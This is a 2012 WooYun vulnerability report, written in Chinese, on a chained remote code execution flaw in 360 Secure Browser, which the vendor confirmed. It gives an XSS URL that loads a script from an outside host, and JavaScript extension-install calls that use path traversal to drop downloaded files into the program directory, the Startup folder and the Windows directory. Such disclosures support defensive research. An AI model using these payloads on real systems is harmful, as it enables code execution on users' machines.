当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013430

漏洞标题:360安全浏览器远程代码执行漏洞(360序列安全漏洞之二)

相关厂商:奇虎360

漏洞作者: 唐尸三摆手

提交时间:2012-10-16 23:52

修复时间:2012-11-30 23:53

公开时间:2012-11-30 23:53

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-16: 细节已通知厂商并且等待厂商处理中
2012-10-17: 厂商已经确认,细节仅向厂商公开
2012-10-20: 细节向第三方安全合作伙伴开放
2012-12-11: 细节向核心白帽子及相关领域专家公开
2012-12-21: 细节向普通白帽子公开
2012-12-31: 细节向实习白帽子公开
2012-11-30: 细节向公众公开

简要描述:

接着上次的漏洞之一来,希望能改变一下别人对技术的态度和看法,偶申明下偶是搞web安全的,但是也对客户端安全乃至安全有一些自己的看法,经过几天的研究又发现了一些严重问题,而且可以证明之前360忽略的漏洞是可以用来突破360自身的安全防御体系的,也就是用于绕过主动防御的,同时关于一些system32目录会不可写之类的安全限制其实自身都有缺陷,也都是可以绕过的,希望大家在评估安全问题的时候思路可以更为开阔点,更为坦诚点,尊重技术。
这里的问题都比较简单,某些问题都是乌云上公开过的,360浏览器在设计上存在一些缺陷,这也是翻看以前的360安全漏洞时学到的,加上在内部某些逻辑时存在问题导致任意覆盖本地文件但受到360自身的安全防护所以不能写入特殊目录,但如果加上上次360忽略的那个dll加载的漏洞实际上就变成可以远程直接加载任意代码的漏洞了。
貌似最新版也有问题

详细说明:

1 360浏览器存在设计缺陷
WooYun: 360安全浏览器远程代码执行漏洞
这里结界师有详细的分析啦,所以获得了一个下载扩展的权限
2 浏览器扩展设计存在缺陷
如果一个../../../../ext的扩展在释放的时候会被释放到上级目录,形成一个本地的目录遍历写入的漏洞,所以我们获得了任意写入本地文件的机会
3 360主程序存在安全漏洞
前段时间由360忽略的可以加载任意dll的漏洞配合第二个条件就可以越过各种安全防护从而启动自身的代码了
所以呢
1 我们需要一个高权限域的xss,这个很多啦

http://browser.baoku.360.cn/app/search?kw=%c0%27//%28%000000%0deval(unescape(location.hash.substr(1)));//#d=document;e=d.createElement('script');e.src='http://ha.ckers.org/xss.js?'+Math.random();d.body.appendChild(e);


baoku就有一个xss,不过貌似被ie的filter拦截啦,不过木有关系,用sogii@wooyun的bypass IE filter 0day即可获得完美xss
2 利用安装扩展写入本地的文件

var info="apptype=1;appdisplaytype=1;appid=/../../../../../Program Files/360/360se/;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
var info="apptype=1;appdisplaytype=1;appid=/../../../../../Documents and Settings/All Users/「开始」菜单/程序/启动;


3 利用dll漏洞启动任意代码
利用dll+主动防御的缺陷即可,system32不可写可是path里的windows可写,这是神马逻辑!!启动栏外部进程不可写但是签名的程序可写,这不正好么

var info="apptype=1;appdisplaytype=1;appid=/../../../../../Program Files/360/360se/;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
var info="apptype=1;appdisplaytype=1;appid=/../../../../../Documents and Settings/All Users/「开始」菜单/程序/启动;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
var info="apptype=1;appdisplaytype=1;appid=/../../../../../windows/;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/361.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
window.location="http://www.360.cn";

漏洞证明:

修复方案:

问下@360安杨 吧,他总是什么都懂

版权声明:转载请注明来源 唐尸三摆手@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-17 11:29

厂商回复:

确认是漏洞,我们正在修复,感谢乌云白帽子的热心反馈

最新状态:

暂无